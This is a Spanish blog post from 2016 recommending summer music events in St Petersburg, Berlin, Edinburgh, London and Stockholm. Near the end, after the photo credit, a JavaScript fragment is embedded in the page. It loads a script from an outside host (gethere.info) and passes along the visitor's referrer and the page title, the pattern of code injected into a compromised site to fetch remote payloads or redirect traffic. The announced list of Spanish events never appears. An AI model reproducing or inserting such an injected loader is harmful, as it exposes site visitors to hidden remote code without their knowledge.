Las citas más veraniegas y musicales

05/07/2016

Notting Hill Carnival

Con el verano llegan los días sin fin, las noches de terraza, las jornadas playeras y piscineras y las ganas de olvidarse de la rutina que nos acompaña durante el resto de meses del año. Si queréis inflar vuestra lista de «quehaceres estivales» atentos a esta pequeña lista. Hemos recopilado una serie de citas internacionales, las más musicales ;). Puede que alguna os guste tanto que os haga hacer la maleta inmediatamente…

  • Festival de las Estrellas de las Noches Blancas en San Petesburgo. Hasta el 14 de julio. El nombre del festival viene dado por las especiales noches veraniegas que envuelven a la ciudad rusa. Días eternos que nunca oscurecen del todo y que rematan con una lánguida luz blanca. Este año el Festival promete más que nunca. ¿El motivo? El recién inaugurado Teatro Mariinsky. ¿Preparados para ver a la Filarmónica de San Petesburgo en acción?
  • Conciertos gratuitos en Gendarmenmarkt. Del 21 al 25 de julio. Berlín se vuelve más loco y jovial que nunca con esta iniciativa musical de libre acceso que cada verano se celebra en una de las plazas más céntricas y emblemáticas de la ciudad. La música al aire libre de todas las formas y colores, te está esperando en una de las ciudades europeas más interesantes.
  • Festival de Edimburgo. Del 5 al 29 de agosto. Edimburgo siempre es una buena opción. Una de esas ciudades pequeñas pero llenas de vida y encanto que en agosto se vuelve aún más placentera. Sus calles se inundan de paseantes ávidos de disfrutar de unas buenas jornadas de música, de ópera, de danza y de teatro. Un ambiente diez.
  • Carnaval de Notting Hill. 28 y 29 de agosto. Todos hemos visto la historia entre Julia Roberts y Hugh Grant. Todos sabemos qué es Notting Hill. Todos sabemos que se trata de uno de los barrios londinenses por excelencia. Si lo queremos ver transformado no nos podemos perder su carnaval: desfiles y carrozas a ritmo de samba y reggae que sí o sí harán que muevas las caderas.
  • Exposición Good Evening Europe!. Hasta finales de año. Exposición recién inaugurada en el Museo Abba de Estocolmo. Se trata de un repaso sobre los 60 años de Eurovisión. Aquí os encontraréis con los mejores temas de todos estos años, y con muchas curiosidades y anécdotas sobre los certámenes y sobre sus participantes.

Hasta aquí nuestra selección internacional. Pero, si lo que nos gusta es el verano bien español, entonces, no podemos perdernos estas citas:

Foto | Mike T

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO